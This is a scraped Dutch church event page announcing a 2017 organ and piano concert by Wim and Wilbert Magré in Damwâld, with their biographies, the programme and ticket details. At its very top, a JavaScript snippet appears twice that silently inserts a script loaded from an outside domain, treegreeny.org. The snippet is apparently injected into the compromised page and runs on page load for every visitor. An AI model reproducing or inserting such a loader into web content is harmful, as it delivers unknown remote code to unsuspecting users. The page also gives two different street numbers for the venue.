;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); ;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Concert op orgel en vleugel door Magré en Magré te Damwâld - PKN Damwâld
27 oktober 2017
19:45 t/m 22:00
de Ontmoeting
Concert op orgel en vleugel door Magré en Magré te Damwâld

Op vrijdagavond 27 oktober zal in “de Ontmoeting” een concert op orgel en vleugel worden gegeven door Wim en Wilbert Magré. Het onlangs gerestaureerde Pels en van Leeuwen orgel biedt een prachtige gelegenheid om een concert te kunnen uitvoeren.
Wim Magré (1962) musicus te Elburg, ontving zijn eerste muzieklessen aan de muziekschool te Elburg van Kees Weggelaar. Daarna studeerde hij orgel bij Willem Hendrik Zwart, organist van de Bovenkerk te Kampen. Verder bekwaamde hij zich aan het Conservatorium te Zwolle waar hij hoofdvak orgel studeerde en in 1989 met goed gevolg afstudeerde.
Als organist is hij verbonden aan de Grote of Sint Nicolaaskerk te Elburg en de Alle-Dag-Kerk (Engelse kerk aan het Begijnenhof) te Amsterdam. Hij maakte vele orgel CD’s op bekende Nederlandse orgels in onder andere: Elburg, Kampen, Bolsward, Den Haag en Apeldoorn.
Wilbert Magré werd in 1992 geboren te Zwolle. Op 8 jarige leeftijd begon hij aan de A.M.V. cursus op de muziekschool in Nunspeet welke hij succesvol heeft afgesloten. Tijdens deze tweejarige cursus begon hij zijn eerste pianolessen bij de bekende pianist Herman Riphagen uit Heerde. Inmiddels heeft de jonge musicus al vele concertreizen gemaakt naar o.a. Parijs, Berlijn, Praag, Wenen, Krakow en Cantebury.
Samen met vader Wim is Wilbert Magré dirigent van het Groot Nederlands Johannes de Heer koor (700 zangers). Onder de naam: “Magré & Magré in concert” hebben vader en zoon diverse concerten in het land op orgel en vleugel gegeven. Tevens hebben de heren Magré al vele CD’s samen opgenomen.
Het concert biedt veel variatie, waarbij werken zullen worden gespeeld van Jan Zwart, Galuppi, Enrico Morricone, Lefébure Wély en John Miles. Naast deze componisten zullen er ook eigen improvisaties aan het programma worden toegevoegd, waarbij enkele stukken voor vierhandig piano ten gehore zullen worden gebracht. Het belooft een prachtig concert te worden waarbij het publiek ruimschoots kan genieten van samenspel tussen orgel en vleugel.
U bent van harte welkom om dit dubbelconcert bij te wonen op 27 oktober a.s. in “de Ontmoeting”, Foarwei 48 te Damwâld. Toegang € 7,50 p.p.,aanvang 19.45 uur.

Locatie: de OntmoetingFoarwei 38, 9104 BX Damwâld